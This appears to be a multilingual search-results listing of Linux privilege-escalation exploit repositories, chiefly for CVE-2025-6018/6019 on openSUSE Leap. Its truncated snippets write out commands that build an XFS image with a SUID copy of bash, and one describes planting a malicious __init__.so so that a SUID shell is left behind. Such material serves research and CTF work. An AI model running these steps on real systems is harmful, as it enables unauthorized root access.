10 matches found
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit
CVE-2025-6018 + CVE-2025-6019 권한 상승 가이드 📋 빠른 익스플로잇 단계 1단계: XFS 이미지 준비 로컬 머신 root@kitploit: Create 300MB XFS image dd if=/dev/zero of=xfs.image bs=1M count=300 mkfs.xfs -f xfs.image Mount and install SUID bash mkdir mnt sudo mount -t xfs xfs.image mnt sudo cp /bin/bash mnt/bash sudo chmod 4755...
opensuse-leap-privesc-exploit
CVE-2025-6018 + CVE-2025-6019 익스플로잇 체인 이 익스플로잇은 openSUSE Leap 15.6을 대상으로 한 HackTheBox 챌린지를 해결하기 위해 개발되었습니다. 크레딧 이 익스플로잇은 Qualys 보안 팀의 원본 연구를 기반으로 합니다: 권고: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt CVE-2025-6018: openSUSE 15의 PAM에서 권한 없는 사용자에서 allowactive로의 LPE CVE-2025-6019:...
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit
CVE-2025-6018 + CVE-2025-6019 権限昇格ガイド 中国語 📋 クイックエクスプロイト手順 ステップ1: XFSイメージを準備(ローカルマシン) root@kitploit: Create 300MB XFS image dd if=/dev/zero of=xfs.image bs=1M count=300 mkfs.xfs -f xfs.image Mount and install SUID bash mkdir mnt sudo mount -t xfs xfs.image mnt sudo cp /bin/bash mnt/bash sudo chmod...
CVE-2024-48990-PoC
이 간단한 셸 스크립트는 이 취약점이 작동하는 데 필요한 모든 파일을 생성합니다. 먼저 가짜 init.so 파일을 컴파일하는 데 사용될 무작위로 생성된 임시 파일을 생성합니다. 취약점이 트리거되면. 이 파일이 실행되어 bash 바이너리를 /tmp/ribbit에 복사하고 SUID 비트를 설정합니다. 다음으로 현재 작업 디렉토리에 importlib 디렉토리를 생성합니다. 그런 다음 생성된 임시 파일을 init.so로 컴파일하여 새로 생성된 디렉토리에 넣습니다. 마지막으로, 대기 상태로 취약점이 트리거되기를 기다리는 또 다른 무작위...
CVE-2025-6018
Guide d'élévation de privilèges CVE-2025-6018 + CVE-2025-6019 Chinois 📋 Étapes d'exploitation rapides Étape 1 : Préparer l'image XFS machine locale root@kitploit: Create 300MB XFS image dd if=/dev/zero of=xfs.image bs=1M count=300 mkfs.xfs -f xfs.image Mount and install SUID bash mkdir mnt sudo...
Hack-The-Box-Connected-Full-Machine-Walkthrough
Hack The Box — Connected Platform: Hack The Box Mac...
Exploit for Incorrect Authorization in Suse Pam-Config
CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Guide 中文...
Exploit for CVE-2024-32019
CVE-2024-32019-poc Netdata ndsudo PoC Build the binary: ba...
Exploit for CVE-2025-6019
CVE-2025-6019 Proof of Concept PoC This repository contains...
Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/342/info After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error...